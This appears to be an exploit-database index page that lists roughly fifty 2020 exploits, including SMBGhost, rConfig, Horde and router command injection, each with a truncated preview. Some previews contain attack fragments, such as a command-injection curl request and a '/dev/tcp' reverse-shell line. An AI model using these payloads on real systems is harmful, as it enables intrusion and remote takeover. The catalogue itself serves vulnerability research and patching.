Oce Colorwave 500 CSRF / XSS / Authentication Bypass Vulnerabilities
Exploit for jsp platform in category web applications Exploit Title: Océ Colorwave 500 printer: Multiple vulnerabilities Exploit Author: Giuseppe Calì, Marco Ortisi Authors blog: https://www.redtimmy.com Vendor Homepage: https://www.canon.com Software Link:...
VMware Fusion 11.5.2 - Privilege Escalation Exploit
Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation Exploit Author: Rich Mirch Vendor Homepage: https://www.vmware.com/products/fusion.html Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html Software Link:...
NetBackup 7.0 - (NetBackup INET Daemon) Unquoted Service Path Vulnerability
Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas Tested Version: 7.0 Vulnerability Type: Unquoted Service Path Tested on OS: Windows...
Broadcom Wi-Fi Devices - (KR00K) Information Disclosure Exploit
Kr00ker Experimental KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, which allows decrypting some WPA2 CCMP data in vulnerable devices. More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP...
Netlink GPON Router 1.0.11 - Remote Code Execution Exploit
Exploit for hardware platform in category web applications Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls...
Microtik SSH Daemon 6.44.3 - Denial of Service Exploit
Exploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: An uncontrolled resource consumption vulnerability in SSH daemon on...
Microsoft VSCode Python Extension - Code Execution Exploit
VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as...
Ivanti Workspace Manager Security Bypass Vulnerability
Ivanti Workspace Manager Security Bypass Vulnerability Rem Remarks CVE-2019-10885 - 0day Rem An issue was discovered in Ivanti Workspace Control before 10.3.90.0. Local authenticated Rem users with low privileges in a Workspace Control managed session can bypass Workspace Control Rem security...
pppd 2.4.8 Buffer Overflow Exploit
Exploit Title: Point to Point Protocol Daemon versions 2.4.2 through 2.4.8 are vulnerable to buffer overflow - remote Author: nu11secur1ty Date: 2020-03-18 Vendor: Point to Point Protocol Daemon Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-8597 CVE:...
Centreon Poller Authenticated Remote Command Execution Exploit
This Metasploit module exploits a flaw where an authenticated user with sufficient administrative rights to manage pollers can use this functionality to execute arbitrary commands remotely. Usually, the miscellaneous commands are used by the additional modules to perform certain actions, by the...
ZoneAlarm TrueVector Internet Monitor Insecure NTFS Permissions Vulnerability
A vulnerability was found in the TrueVector Internet Monitor service, which is installed as part of the Check Point ZoneAlarm firewall. This vulnerability allows a local attacker to cause the affected service to change the file permissions of arbitrary local files. After the file permissions have...
Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode 232 bytes
Shellcode Title: Windows\x64 Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode 232 bytes Shellcode Author: Bobby Cooke Date: March 2020-03-17 Tested On: Windows 10 Pro 1909 x86: HelpPane.exe, notepad.exe, certutil.exe Windows 10 Pro 1909 x86_64: mmc.exe, xwizard.exe ! Will onl...
VMWare Fusion - Local Privilege Escalation Exploit
Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusion 11.0.0 10120384 on macOS 10.14.1 VMware...
Easy File Sharing Web Server 7.2 Local Buffer Overflow Exploit
Exploit Title: Easy File Sharing Web Server 7.2 - SMTP 'Password' Local Buffer Overflow SEH Author: Felipe Winsnes Vendor Homepage: http://www.sharing-file.com/ Software Link: http://www.sharing-file.com/download.php Version: 7.2 Tested on: Windows 7 Proof of Concept: 1.- Run the python script...
Zyxel CNM SecuManager 3.1.0 / 3.1.1 Hardcoded Keys / XSS / Code Execution Vulnerabilities
Zyxel CNM SecuManager versions 3.1.0 and 3.1.1 suffer from having hard-coded secrets, missing authentication, backdoors, and remote code execution vulnerabilities. Zyxel CNM SecuManager 3.1.0 / 3.1.1 Hardcoded Keys / XSS / Code Execution The HTML version on "Multiple vulnerabilities found in Zyxe...
MiladWorkShop VIP System 1.0 SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection Google Dork: Powered By MiladWorkShop VIP System Exploit Author: AYADI Mohamed Vendor Homepage: https://miladworkshop.ir/ Software Link:...
Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery Vulnerability
Exploit for php platform in category web applications Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link: http://www.sumavision.com/ensite/i.php?id=29 Version: EMR 3.0.4.27 CV...
PHPKB Multi-Language 9 image-upload.php Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.p...
UADMIN Botnet SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: UADMIN Botnet - SQL Injection Vulnerability Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: unkn0wn Version: unkn0wn Tested on: Windows 10, Kali CVE : n/a Vuln-Code: download.php $link=$_GET['link'];...
PHPKB Multi-Language 9 Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
PHPKB Multi-Language 9 Authenticated Directory Traversal Exploit
Exploit for php platform in category web applications Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
Microsoft Windows SMB 3.1.1 Remote Code Execution Exploit
Exploit Title: Windows SMBv3 Client/Server Remote Code Execution Vulnerability - remote Author: nu11secur1ty Vendor: https://smb.wsu.edu/ Link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796 CVE: CVE-2020-0796 + Credits: Ventsislav Varbanovski @ nu11secur1ty...
Rconfig 3.x Chained Remote Code Execution Exploit
This Metasploit module takes advantage of a command injection vulnerability in the path parameter of the ajax archive file functionality within the rConfig web interface in order to execute the payload. Valid credentials for a user with administrative privileges are required . However, this modul...
Microsoft Windows 10 (1903/1909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow
Microsoft Windows 10 1903/1909 - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow PoC CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This scrip...
Phoenix Contact TC Router / TC Cloud Client Command Injection Vulnerability
Phoenix Contact TC Router and TC Cloud Client versions 2.05.3 and below, 2.03.17 and below, and 1.03.17 and below suffer from authenticated command injection and various other vulnerabilities. ======================================================================= title: Authenticated Command...
ManageEngine Desktop Central Java Deserialization Exploit
This Metasploit module exploits a Java deserialization vulnerability in the getChartImage method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64. This module requires Metasploit: https://metasploit.com/download Current source:...
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/bin/sh if "$" -ne 4 ; then echo '! Usage: ' 1&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$mktemp" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1&2 curl -si -c "$JAR" "$BASE/login.php" \ -d...
Drobo 5N2 4.1.1 - Remote Command Injection Exploit
Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection Date: 2020-03-12 Exploit Author: Rick Ramgattie, Ian Sindermann Vendor Homepage: https://www.drobo.com/ Version: 4.1.1 and lower. CVE: CVE-2018-14709, CVE-2018-14701 !/usr/bin/env python3 nasty.py - A proof-of-concept utility for malicious...
Centos WebPanel 7 - (term) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Centos WebPanel 7 - 'term' SQL Injection Exploit Author: Berke YILMAZ Vendor Homepage: http://centos-webpanel.com/ Software Link: http://centos-webpanel.com/ Version: v6 - v7 Tested on: Kali Linux - Windows 10 CVE : N/A Type:...
AnyBurn 4.8 - Buffer Overflow (SEH) Exploit
Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8 Vulnerability Type :...
ASUS AAHM 1.00.22 - (asHmComSvc) Unquoted Service Path Vulnerability
Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path Discovery by: Roberto Piña Vendor Homepage: https://www.asus.com/ Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3Win10H97M-ProV10102.zip?ga=2.170180192.1334401606.1583873755-790266082.1583873755 Tested...
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading Exploit
Exploit for php platform in category web applications exploit-phar-loading.py !/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMPDIR = '/tmp' WWWROOT = '/var/www/html' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password =...
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Vulnerability
Exploit for java platform in category web applications Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Vendor: https://www.watchguard.com Software link:...
Wordpress Appointment Booking Calendar 1.3.34 Plugin - CSV Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link:...
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion Exploit
Exploit for php platform in category web applications exploit-inc-inclusion.py !/usr/bin/env python3 from horde import Horde import subprocess import sys TEMPDIR = '/tmp' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode =...
SQL Server Reporting Services (SSRS) ViewState Deserialization Exploit
A vulnerability exists within Microsoft's SQL Server Reporting Services which can allow an attacker to craft an HTTP POST request with a serialized object to achieve remote code execution. The vulnerability is due to the fact that the serialized blob is not signed by the server. This module...
Joomla com_newsfeeds 1.0 Component - (feedid) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork: inurl:index.php?option=com_newsfeeds...
rConfig 3.9 - (searchColumn) SQL Injection Exploit
Exploit for php platform in category web applications Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see also :...
rConfig 3.93 - (ajaxAddTemplate.php) Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login =...
Wordpress Search Meter 2.13.2 Plugin - CSV injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip Version...
Wing FTP Server 6.2.3 Cross Site Request Forgery Vulnerability
Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation Exploit Author: Dhiraj Mishra Vendor Homepage: https://www.wftpserver.com Version: v6.2.6 Tested on: Windows 10 Summary: An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTML page could dele...
ASUS AXSP 1.02.00 - (asComSvc) Unquoted Service Path Vulnerability
Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Vendor Homepage: https://www.asus.com/ Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3Win10H97M-ProV10102.zip?ga=2.170180192.1334401606.1583873755-790266082.1583873755 Tested...
Nagios XI - Authenticated Remote Command Execution Exploit
This Metasploit module exploits a vulnerability in Nagios XI versions before 5.6.6 in order to execute arbitrary commands as root. The module uploads a malicious plugin to the Nagios XI server and then executes this plugin by issuing an HTTP GET request to download a system profile from the serve...
YzmCMS 5.5 - (url) Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting Exploit Author: En Vendor Homepage: https://github.com/yzmcms/yzmcms Software Link: https://github.com/yzmcms/yzmcms Version: V5.5 Category: Web Application Patched Version:...
Counter Strike : GO - (.bsp) Memory Control Exploit
So I’ve been holding onto this neat little gem of a .bsp that has four bytes very close to the end of the file that controls the memory allocator. See above picture. Works on all supported operating systems last I checked so Linux, Windows, and macOS, even after a few years. Download...
Persian VIP Download Script 1.0 - (active) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Persian VIP Download Script 1.0 - 'active' SQL Injection Exploit Author: S3FFR Vendor Homepage: http://download.freescript.ir/scripts/Persian-VIP-DownloadFreeScript.ir.zip Version: = 1.0 Final Version Tested on: Windows,Linux...
Sysaid 20.1.11 b26 - Remote Command Execution Vulnerability
Exploit for java platform in category web applications Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution Google Dork: intext:"Help Desk Software by SysAid " Exploit Author: Ahmed Sherif Vendor Homepage: https://www.sysaid.com/free-help-desk-software Software Link:...
PHPStudy - Backdoor Remote Code execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "PHPStudy Backdoor Remote Code execution", 'Description' = %q This module can detect and exploit the backdoor of PHPStudy. , 'License' = MSFLICENS...
Citrix Gateway 11.1 / 12.0 / 12.1 Information Disclosure Vulnerability
Exploit for multiple platform in category web applications Product: Citrix Gateway Manufacturer: Citrix Systems, Inc. Affected Versions: 11.1, 12.0, 12.1 Tested Versions: 11.1.63.15, 12.0.63.13, 12.1.55.18 Vulnerability Type: Information Exposure Through Caching CWE-512 Risk Level: Information...